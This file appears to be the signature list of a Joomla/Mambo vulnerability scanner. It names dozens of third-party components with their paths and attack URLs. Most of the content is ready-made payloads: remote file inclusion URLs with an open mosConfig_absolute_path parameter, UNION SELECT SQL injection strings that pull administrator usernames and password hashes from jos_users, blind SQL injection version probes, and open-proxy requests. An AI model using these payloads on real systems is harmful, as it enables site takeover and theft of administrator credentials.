older|/admin/components/com_joomla_flash_uploader/|/admin/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path= Color Lab File Inclusion Vulnerability Versions effected: 1.0 and older|/administrator/components/com_colorlab/|/administrator/components/com_color/admin.color.php?mosConfig_live_site= Color Lab File Inclusion Vulnerability Versions effected: 1.0 and older|/admin/components/com_colorlab/|/administrator/components/com_color/admin.color.php?mosConfig_live_site= Carousel Flash Image Gallery File Inclusion Vulnerability Versions effected: 1.0 and older|/administrator/components/com_jjgallery/|/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path= Carousel Flash Image Gallery File Inclusion Vulnerability Versions effected: 1.0 and older|/admin/components/com_jjgallery/|/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path= JUser File Inclusion Vulnerability Versions effected: 1.0.14 and older|/administrator/components/com_juser/|/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path= JUser File Inclusion Vulnerability Versions effected: 1.0.14 and older|/admin/components/com_juser/|/admin/components/com_juser/xajax_functions.php?mosConfig_absolute_path= Joomla! 12Pictures File Inclusion Vulnerability Versions effected: 1.0 and older|/administrator/components/com_joom12pic/|/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site= Joomla! 12Pictures File Inclusion Vulnerability Versions effected: 1.0 and older|/admin/components/com_joom12pic/|/admin/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site= Flash Panoramic View File Inclusion Vulnerability Versions effected: 1.0 and older|/administrator/components/com_panoramic/|/administrator/components/com_panoramic/admin.panoramic.php?mosConfig_live_site= Flash Panoramic View File Inclusion Vulnerability Versions effected: 1.0 and older|/admin/components/com_panoramic/|/admin/components/com_panoramic/admin.panoramic.php?mosConfig_live_site= Community Builder Component File Inclusion Vulnerability Versions Affected: 1.0 <=|/components/com_comprofiler/plugin.class.php|/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path= com_admin File Inclusion Vulnerability Versions Affected: N/A|/admin/components/com_admin/admin.admin.html.php|/admin/components/com_admin/admin.admin.html.php?mosConfig_absolute_path= com_admin File Inclusion Vulnerability Versions Affected: N/A|/components/com_admin/admin.admin.html.php|/components/com_admin/admin.admin.html.php?mosConfig_absolute_path= com_flyspray File Inclusion Vulnerability Versions Affected: N/A|/components/com_flyspray/startdown.php|/components/com_flyspray/startdown.php?file= com_admin File Inclusion Vulnerability Versions Affected: N/A|/administrator/components/com_admin/admin.admin.html.php|/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path= ExtCalendar File Inclusion Vulnerability Versions effected: 0.9.1 and older|/components/com_extcalendar/extcalendar.php|/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path= PC CookBook File Inclusion Vulnerability Versions effected: 1.3 and older|/components/com_pccookbook/pccookbook.php|/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path= com_smf File Inclusion Vulnerability Versions Affected: N/A|/components/com_smf/smf.php|/components/com_smf/smf.php?mosConfig_absolute_path= mod_calendar File Inclusion Vulnerability Versions Affected: N/A|/modules/mod_calendar.php|/modules/mod_calendar.php?absolute_path= com_loudmounth File Inclusion Vulnerability Versions Affected: N/A|/components/com_loudmounth/includes/abbc/abbc.class.php|/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path= Multibanners File Inclusion Vulnerability Versions effected: Any Version|/administrator/components/com_multibanners/extadminmenus.class.php|/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path= Multibanners File Inclusion Vulnerability Versions effected: Any Version|/admin/components/com_multibanners/extadminmenus.class.php|/admin/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path= akocomments.php File Inclusion Vulnerability Versions Affected: N/A|/akocomments.php|/akocomments.php?mosConfig_absolute_path= Crop Image File Inclusion Vulnerability Versions effected: 1.0 and older|/administrator/components/com_cropimage/admin.cropcanvas.php|/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir= Crop Image File Inclusion Vulnerability Versions effected: 1.0 and older|/admin/components/com_cropimage/admin.cropcanvas.php|/admin/components/com_cropimage/admin.cropcanvas.php?cropimagedir= Serverstat File Inclusion Vulnerability Versions effected: 0.4.4 and older|/administrator/components/com_serverstat/install.serverstat.php|/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path= Serverstat File Inclusion Vulnerability Versions effected: 0.4.4 and older|/admin/components/com_serverstat/install.serverstat.php|/admin/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path= Remository File Inclusion Vulnerability Versions effected: 3.25 and older|/administrator/components/com_remository/admin.remository.php|/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= Remository File Inclusion Vulnerability Versions effected: 3.25 and older|/admin/components/com_remository/admin.remository.php|/admin/components/com_remository/admin.remository.php?mosConfig_absolute_path= Lurm Constructor File Inclusion Vulnerability Versions effected: 0.6b and older|/administrator/components/com_lurm_constructor/admin.lurm_constructor.php|/administrator/components/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path= Lurm Constructor File Inclusion Vulnerability Versions effected: 0.6b and older|/admin/components/com_lurm_constructor/admin.lurm_constructor.php|/admin/components/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path= Php Shop File Inclusion Vulnerability Versions effected: 1.2 RC2b and older|/administrator/components/com_phpshop/toolbar.phpshop.html.php|/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path= Php Shop File Inclusion Vulnerability Versions effected: 1.2 RC2b and older|/admin/components/com_phpshop/toolbar.phpshop.html.php|/admin/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path= Mambo eMail Publisher File Inclusion Vulnerability Versions Affected: N/A|/administrator/components/com_mmp/help.mmp.php|/administrator/components/com_mmp/help.mmp.php?mosConfig_absolute_path= BSQ Site Stats File Inclusion Vulnerability Versions effected: N/A|/components/com_bsq_sitestats/external/rssfeed.php|/components/com_bsq_sitestats/external/rssfeed.php?baseDir= CHRONOContact File Inclusion Vulnerability Versions effected: N/A|/administrator/components/com_chronocontact/excelwriter/PPS/File.php|/administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path= CHRONOContact File Inclusion Vulnerability Versions effected: N/A|/admin/components/com_chronocontact/excelwriter/PPS/File.php|/admin/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path= com_feederator File Inclusion Vulnerability Versions Affected: N/A|/components/com_feederator/includes/tmsp/add_tmsp.php|/components/com_feederator/includes/tmsp/add_tmsp.php?mosConfig_absolute_path= com_feederator File Inclusion Vulnerability Versions Affected: N/A|/administrator/components/com_feederator/includes/tmsp/add_tmsp.php|/administrator/components/com_feederator/includes/tmsp/add_tmsp.php?mosConfig_absolute_path= com_feederator File Inclusion Vulnerability Versions Affected: N/A|/admin/components/com_feederator/includes/tmsp/add_tmsp.php|/admin/components/com_feederator/includes/tmsp/add_tmsp.php?mosConfig_absolute_path= Component GameQ Remote SQL injection Version Affected: 4.0 <=|/components/com_gameq/|/index.php?option=com_gameq&task=page&category_id=-1+UNION+SELECT+1,2,3,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),5,6,7,8,9,10,11,12,13,14+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-- astatsPRO SQL Injection Vulnerability Versions effected: 1.0.0 and older|/administrator/components/com_astatspro/refer.php|/administrator/components/com_astatspro/refer.php?id=-1+UNION+SELECT+0,1,concat(username,0x3a,password,0x3a,usertype,0x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-- astatsPRO SQL Injection Vulnerability Versions effected: 1.0.0 and older|/admin/components/com_astatspro/refer.php|/admin/components/com_astatspro/refer.php?id=-1+UNION+SELECT+0,1,concat(username,0x3a,password,0x3a,usertype,0x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-- prayercenter Remote SQL injection Version Affected: N/A|/components/com_prayercenter|/index.php?option=com_prayercenter&task=view_request&id=-1+UNION+SELECT+1,1,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),1,1,1,1,1,1,1,1,1,1+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-- pcchess SQL Injection Vulnerability Versions effected: N/A|/components/com_pcchess/|/index.php?option=com_pcchess&Itemid=61&page=players&user_id=-9999999+UNION+SELECT+concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-- com_garyscookbook SQL Injection Vulnerability Versions Affected: N/A|/components/com_garyscookbook/|/index.php?option=com_garyscookbook&Itemid=21&func=detail&id=-666+UNION+SELECT+0,0,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),0,0,0,0,0,0,0,0,0,0,0,1,1,1,0,0,0,0,0,0+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-- com_hello_world SQL Injection Vulnerability Versions Affected: N/A|/components/com_hello_world/|/index.php?option=com_hello_world&Itemid=27&task=show&type=intro&id=-9999999+UNION+SELECT+1,2,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),4+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-- com_cms SQL Injection Vulnerability Versions Affected: N/A|/components/com_cms/|/index.php?option=com_cms&act=viewitems&cat_id=-9999999+UNION+SELECT+111,111,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),222,222,333,333+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-- com_most SQL Injection Vulerability Versions Affected: N/A|/components/com_most/|/index.php?option=com_most&mode=email&secid=-9999999+UNION+SELECT+0000,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),2222,3333+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-- com_idvnews SQL Injection Vulerability Versions Affected: N/A|/components/com_idvnews/|/index.php?option=com_idvnews&id=-1+UNION+SELECT+0,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),2222,0,0,0,0,0+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-- com_joomlavvz SQL Injection Vulnerability Versions Affected: N/A|/components/com_joomlavvz/|/index.php?option=com_joomlavvz&Itemid=34&func=detail&id=-9999999+UNION+SELECT+0x3a,0x3a,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),0,0,0,0,0,0,0,0,0,0,0,0,0+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-- com_referenzen SQL Injection Vulnerability Versions Affected: N/A|/components/com_referenzen/|/index.php?option=com_referenzen&Itemid=7&detail=-9999999+UNION+SELECT+1,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),3,4,5,6,7,8,9,0,0,0,0,0+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-- com_genealogy SQL Injection Vulnerability Versions Affected: N/A|/components/com_genealogy/|/index.php?option=com_genealogy&task=profile&id=-9999999+UNION+SELECT+0,1,2,3,4,5,6,7,8,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-- com_listoffreeads SQL Injection Vulnerability Versions Affected: N/A|/components/com_listoffreeads/|/index.php?option=com_listoffreeads&AdId=-1+UNION+SELECT+0,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-- com_geoboerse SQL Injection Vulnerability Versions Affected: N/A|/components/com_geoboerse/|/index.php?option=com_geoboerse&page=view&catid=-1+UNION+SELECT+concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-- com_ricette SQL Injection Vulnerability Versions Affected: N/A|/components/com_ricette/|/index.php?option=com_ricette&Itemid=1&func=detail&id=-9999999+UNION+SELECT+0,0,111,111,222,333,0,0,0,0,0,1,1,1,1,1,1,1,1,1,0,0,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-- com_team SQL Injection Vulnerability Versions Affected: N/A|/components/com_team/|/index.php?option=com_team&gid=-1+UNION+SELECT+1,2,3,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),5,6,7,8,9,10,username,12,13+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-- com_formtool SQL Injection Vulnerability Versions Affected: N/A|/components/com_formtool/|/index.php?option=com_formtool&task=view&formid=2&catid=-9999999+UNION+SELECT+concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-- com_sg SQL Injection Vulnerability Versions Affected: N/A|/components/com_sg/|/index.php?option=com_sg&Itemid=16&task=order&range=3&category=3&pid=-9999999+UNION+SELECT+0,1,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),0,0,0,0,0,0,0,10,11,0,0,14,15,16+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-- faq SQL Injection Vulnerability Versions effected: N/A|/components/com_faq|/index.php?option=faq&task=viewallfaq&catid=-9999999+UNION+SELECT+concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),0,0+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-- com_omnirealestate SQL Injection Vulnerability Versions Affected: N/A|/components/com_omnirealestate/|/index.php?option=com_omnirealestate&Itemid=0&func=showObject&info=contact&objid=-9999+UNION+SELECT+1,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--&results=joomla com_model SQL Injection Vulnerability Versions Affected: N/A|/components/com_model/|/index.php?option=com_model&Itemid=0&task=pipa&act=2&objid=-9999+UNION+SELECT+username,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-- com_mezun SQL Injection Vulnerability Versions Affected: N/A|/components/com_mezun/|/index.php?option=com_mezun&task=edit&hidemainmenu=joomla&id=-9999999+UNION+SELECT+0,0,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),0x3a,0x3a,0x3a,0x3a,0x3a,0x3a,0x3a,0x3a+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-- com_ewriting SQL Injection Vulnerability Versions Affected: N/A|/components/com_ewriting/|/index.php?option=com_ewriting&Itemid=9999&func=SELECTcat&cat=-1+UNION+ALL+SELECT+1,2,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),4,5,6,7,8,9,10+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-- com_livechat SQL Injection Vulnerability Versions Affected: N/A|/components/com_livechat/getSavedChatRooms.php|/components/com_livechat/getSavedChatRooms.php?chat=0&last=1%20union%20select%201,unhex(hex(concat(username,0x3a,password))),3%20from%20jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-- com_livechat SQL Injection Vulnerability Versions Affected: N/A|/administrator/components/com_livechat/getSavedChatRooms.php|/administrator/components/com_livechat/getSavedChatRooms.php?chat=0&last=1%20union%20select%201,unhex(hex(concat(username,0x3a,password))),3%20from%20jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-- com_livechat SQL Injection Vulnerability Versions Affected: N/A|/admin/components/com_livechat/getSavedChatRooms.php|/admin/components/com_livechat/getSavedChatRooms.php?chat=0&last=1%20union%20select%201,unhex(hex(concat(username,0x3a,password))),3%20from%20jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-- com_livechat Open Proxy Vulnerability Versions Affected: N/A|/components/com_livechat/xmlhttp.php|/components/com_livechat/xmlhttp.php?GET$01$2$3$4$5$http://www.google.com com_livechat Open Proxy Vulnerability Versions Affected: N/A|/administrator/components/com_livechat/xmlhttp.php|/administrator/components/com_livechat/xmlhttp.php?GET$01$2$3$4$5$http://www.google.com com_livechat Open Proxy Vulnerability Versions Affected: N/A|/admin/components/com_livechat/xmlhttp.php|/admin/components/com_livechat/xmlhttp.php?GET$01$2$3$4$5$http://www.google.com com_mydyngallery SQL Injection Vulnerability Versions Affected: N/A|/components/com_mydyngallery/|/index.php?option=com_mydyngallery&directory=zzz'+union+select+0,1,2,concat(0x3C703E,username,0x7c,password,0x3C2F703E),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-- com_jmovies SQL Injection Vulnerability Versions Affected: N/A|/components/com_jmovies|/index.php?option=com_jmovies&Itemid=29&task=detail&id=-1+union+select+1,concat(0x215F,username,0x3a,password,0x215F)+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-- com_tech_article SQL Injection Vulnerability Versions Affected: N/A|/components/com_tech_article/|/index.php?option=com_tech_article&task=item&Itemid=17&item=-1+union+select+0,concat(username,0x3a,password),0,0,0,0,0,0,0+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-- com_hbssearch Blind SQL Injection Vulnerability Versions Affected: N/A|/components/com_hbssearch/|/index.php?option=com_hbssearch&task=showhoteldetails&id=4&chkin=2008-08-15&chkout=2008-08-18&datedif=3&str_day=Fri&end_day=Mon&start_day=&star=&child1=0&adult1=1&Itemid=54&r_type=1+and+substring(@@version,1,1)=5::/index.php?option=com_hbssearch&task=showhoteldetails&id=4&chkin=2008-08-15&chkout=2008-08-18&datedif=3&str_day=Fri&end_day=Mon&start_day=&star=&child1=0&adult1=1&Itemid=54&r_type=1+and+substring(@@version,1,1)=6 com_tophotelmodule Blind SQL Injection Vulnerability Versions Affected: N/A|/components/com_tophotelmodule/|/index.php?option=com_tophotelmodule&task=showhoteldetails&id=1 and substring(@@version,1,1)=5::/index.php?option=com_tophotelmodule&task=showhoteldetails&id=1 and substring(@@version,1,1)=6 com_volunteer SQL Injection Vulnerability Version Affected: N/A|/components/com_volunteer|/index.php?option=com_volunteer&task=jobs&act=jobshow&Itemid=29&orgs_id=3&job_id=-9999+union+all+select+concat(username,char(58),password),2,3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--&filter=&city_id=&function_id=&limit=5&pageno=1 Joomla Component com_lowcosthotels (id) Blind SQL Injection Vulnerability Versions Affect: N/A|/components/com_lowcosthotels|/index.php?option=com_lowcosthotels&task=showhoteldetails&id=13+and%20substring(@@version,1,1)=5::/index.php?option=com_lowcosthotels&task=showhoteldetails&id=13+and%20substring(@@version,1,1)=6 Joomla Component com_allhotels (id) Blind SQL Injection Vulnerability Versions Affect: N/A|/components/com_allhotels|/index.php?option=com_allhotels&task=showhoteldetails&id=1+and%20substring(@@version,1,1)=5::/index.php?option=com_allhotels&task=showhoteldetails&id=1+and%20substring(@@version,1,1)=6 Joomla Component com_ice(catid) Blind SQL Injection Versions Affected: N/A |/components/com_ice/|/index.php?option=com_ice&catid=1 and substring(@@version,1,1)=5::/index.php?option=com_ice&catid=1 and substring(@@version,1,1)=6 Joomla Component com_liveticker(tid) Blind SQL Injection |/components/com_liveticker/|/index.php?option=com_liveticker&task=viewticker&tid=1 and substring(@@version,1,1)=5::/index.php?option=com_liveticker&task=viewticker&tid=1 and substring(@@version,1,1)=6 Joomla Component com_mdigg(category) SQL Injection vulnerability Versions Affected: N/A|/components/com_mdigg|/index.php?option=com_mdigg&act=story_lists&task=view&category=-9999/**/union/**/all/**/select/**/1,2,3,4,concat(username,0x3a,password),6,7,8,9,0,11,12,13/**/from/**/jos_users/* Joomla Module com_5starhotels(id) SQL Vulnerability Versions Affected: N/A|/components/com_5starhotels|/index.php?option=com_5starhotels&task=showhoteldetails&id=1+union+select+1,concat(username,0x3a,password)+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--